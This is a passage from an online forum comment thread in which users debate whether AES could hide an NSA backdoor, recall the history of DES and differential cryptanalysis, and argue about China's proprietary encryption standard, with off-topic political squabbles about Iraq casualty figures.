      Oh yeah? Care to back that statement up?
      For the record, I know that many sites in China use SecureShell to transmit data to and from customers (some of them outside China), and I have personally visited China and installed such a system. It's completely in the open that this is how it's set up, and these are high-visibility sites we're talking about.

  34. Chinese - Encryption?? by krod4 · · Score: 0, Troll

    Goddamnit! Let's not let the Chinese have any say in any encrypting of anything! Only us here in the good old US of A have the competence to make such systems!

  35. Extremely unlikely by Sycraft-fu · · Score: 1

    The fact aside that AES was developed by non-US researchers, is open to the world, and has been extensively examined by the best cryptographers in the world it wouldn't make sense. The NSA's job is protecting US interests. Those interests include classified government data and US financial data, both of which AES is approved for. So for the NSA to know about a flaw but keep it secret would mean:

    1) That the NSA was able to discover a flaw in AES before it was approved, even though no one else has ever come close in all the time it's been out.

    2) They believe they are the only ones smart enough to ever find the flaw, and thus it's safe to allow out in the wild.

    I just can't see that. While it's possible the SVR isn't as good as the NSA, fair bet they are pretty good and I can't see the NSA wanting to chance something like that. To make that kind of arrogant assumption would be pretty colossally stupid.

    It's a pretty safe bet that AES is indeed secure. It has been extensively checked by all sorts of crypto heavy hitters, including the NSA, and they all have weighed in as saying it's secure. It's kinda like the open source idea. Sure you can't say for SURE there's no bugs, but if the code is open, and it's been reviewed for years (without changes) by the best of the best, you are as close to sure as you can get.

    1. Re:Extremely unlikely by Eivind · · Score: 1
      We don't disagree. I already said I don't find it likely, just possible.

      It's possible to win the national lottery 10 times in a row too. Or to crack AES by successfully guessing the correct key on the very first try.

  36. Did they really think by popsicle67 · · Score: 1

    Are the Chinese so naive to think they are on a level field with the rest of the world? Do they really think that throwing tantrums will help them? The world, quite understandably, cringes every time a deal with China has to be made. We all want to reap the rewards of a market that size but we are also loathe to keep making the same rationalizations over and over so we can sleep at night with the image of that student going under that tank.

  37. That's AES by Sycraft-fu · · Score: 1

    As others noted, it's an open standard. Good encryption isn't developed behind closed doors, it is something that you have to have people beat on for years before you are convinced it's worthwhile. Well AES has been a standard as AES for 5 years, and the process for it to become the standard was another 5 years. In those 10 years it's been heavily examined, it's probably the most examined algorithm other than the original DES. Because of its approval by the US government, and its use in SSH/SSL it's of interest to a whole lot of people that it's secure. Thus far, it is.

    Well my friend, that's as good as it gets in the crypto world. You can't prove (in the for-sure mathematical sense) that a crypto algorithm is secure. You can only test it extensively. That's been done with AES, and not just by the NSA.

    I suppose there is a minuscule chance that the NSA can crack AES when nobody else can, but in that case you are fucked anyway since that's what (new) SSL and SSH use anyhow.

  38. Can't blame them by WindBourne · · Score: 1

    3 months ago, the Chinese president had to come to here and meet with Gates/Ballmer and the CEO of Boeing, followed by W. Now, the feds have decided that it is okay to allow all sorts of dual use IP to go to China. It is certain that all this info and goods will make it into other companies.

    --
    I prefer the "u" in honour as it seems to be missing these days.
  39. hmm by Anonymous Coward · · Score: 0

    1) the Chinese are smart
    2) the Americans are not (except for the Germans and Chinese they imported)
    3) The above mentioned protocols have been exploited in the past
    4) the current American politics does raise suspicion on everything made in America
    5) the refusal to have some of the DNS servers controlled outside the USA just proves this.
    6) the only people that have a problem with Chinese technology is the USA
    7) most Europeans would I bet be OK with using Chinese technology since in a lot of cases it's light years ahead of the USA technology.
    8) I SEE NO FREAKING PROBLEM IN USING DIFFERENT STANDARDS FROM DIFFERENT COUNTRIES. IN FACT this is a plus. It's like opensource... everyone contributes something and therefore it's gonna be harder for someone to create and exploit it.

    1. Re:hmm by Anonymous Coward · · Score: 0

      The problem isn't the country. The problem is the centralised architecture, and the closed-ness of the design and implementation.

    2. Re:hmm by WhiteWolf666 · · Score: 1

      1) you are dumb
      2) you don't understand the situation
      3) you are blindly parroting anti-americanism as a defense of your ignorance
      4) you bring up irrelevant anecdotes to prove your position
      5) you are dumb
      6) calling a secret, proprietary technology a "standard" doesn't make it one.
      7) i have been trolled. i should learn not to feed the trolls.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
  40. Not so by Paul+Crowley · · Score: 1

    As another comment mentioned, it was IBM who first invented DC. And DES is vulnerable to linear cryptanalysis, indicating that maybe that's something that got invented in the open community first.

    I don't believe that they are way ahead of us these days. They invented SHA-1 - now we've broken it. Skipjack's margin of safety has been whittled down to nothing with Biham's "impossible differentials". Their proposal "double counter mode" was broken within 24 hours. I think the widespread idea that they are still decades ahead of us is pure myth.

  41. Simply Put... by Anonymous Coward · · Score: 0

    ...it's one step of a POWER PLAY.

    China wants to be even more of a commercial power than ever, using a dual communist-ideology/capitalist-practice strategy against the West to help the latter collapse upon itself.

    There's no ideological closed-source vs. open-source face-off here; the Communists want to be in a position to control YOU and how you communicate. You all bitch about the NSA's telephone call pattern analysis - well, here's a REAL attempt to get the means to listen in on what you talk about, and to shut you up if what you say is "inconvenient" and "unfortunate."

    Get this straight: the so-called People's Republic of China is an oligarchy whose stated ideology is diametrically opposed to how YOU (and I'm talking to you Slashdotters) behave. Unless and until another Tiananmen uprising occurs - and succeeds - the communists remain our foes. Cordial ones, to be sure, but foes nonetheless.

    To the expat above who whined about his/her material getting ripped off: Welcome to the joys of dealing with a 3rd world government, baby. You have no chance in hell of remuneration. Get used to it.

  42. Very unlikely by Paul+Crowley · · Score: 1

    There's no room to hide a secret "back door" in AES. Every step of its design is clear and well justified. There are no special hidden tables to sneak a back door into. And the guys who invented it were Belgian.

    The NSA gave their blessing to all five final candidates. It's wildly implausible that they can break them all.

    1. Re:Very unlikely by Eivind · · Score: 1
      Ok. That's a valid point. I was thinking of the tweaks to DES-tables way-back-when. Yes, I'm aware that all later evidence suggest that this was done to protect against differential cryptanalysis which apparently NSA knew about at DES design-time when nobody else did. (at least nobody that's talking about it)

      But you're right, there's no such arbitrary, unexplained table-tweaks in AES.

  43. Reputable resource by amightywind · · Score: 1

    Maybe you should look at a more reputable resource as the original poster provided. Amnesty International reports the death toll under Saddam as just over 17,000. I think you will find that is LESS than those slaughtered by "friendly" forces during the illegal invasion of Iraq...

    It takes nerve to use reputable and Amnesty International in the same thought. The left will do anything to sabotage the great work of Iraqi Freedom, including fabricate statistics. Well, you are only off by a factor of 20. As for legality, I find the operation more palatable from a legal standpoint than the graft and corruption of the Oil for Food crimes that preceded it.

    --
    an ill wind that blows no good
  44. Actually you are both wrong by Anonymous Coward · · Score: 0

    The VERIFIED number of disappearances according to Amnesty is 17,000, but may be much higher.
    The VERIFIED number of civilians killed during the Iraq war and subsequent occupation is 38355, but may be much higher.

    According to various sources the mass graves do not contain the vastly inflated figure as mentioned in your previous quotes.
    Additionally, many of the mass graves have been verified to stem from the previous war. Where they contain the bodies of those victims of the previous conflict.

    Now, can't you both agree to disagree and shut the hell up! This sounds nothing like a WAPI discussion!!

    MOD PARENT DOWN (and the other idiot/troll)